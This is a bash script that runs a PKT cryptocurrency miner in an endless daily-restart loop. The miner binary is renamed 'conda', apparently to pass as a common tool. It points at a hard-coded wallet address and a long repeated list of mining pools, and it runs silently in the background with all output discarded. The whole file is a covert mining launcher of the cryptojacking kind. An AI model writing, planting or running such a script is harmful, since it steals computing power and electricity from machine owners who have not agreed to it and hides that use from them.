#!/bin/bash
sleep 60
while true; do
nohup ./conda ann -t 1 -p pkt1qlf3m8dtegr7qa76l2qzj82pc56p0uxye560ef8 http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://youtube.com http://pool.pktpool.io http://pool.pkt.world http://pool.srizbi.com > /dev/null 2>&1 &
sleep 24h
pkill conda
sleep 6
done

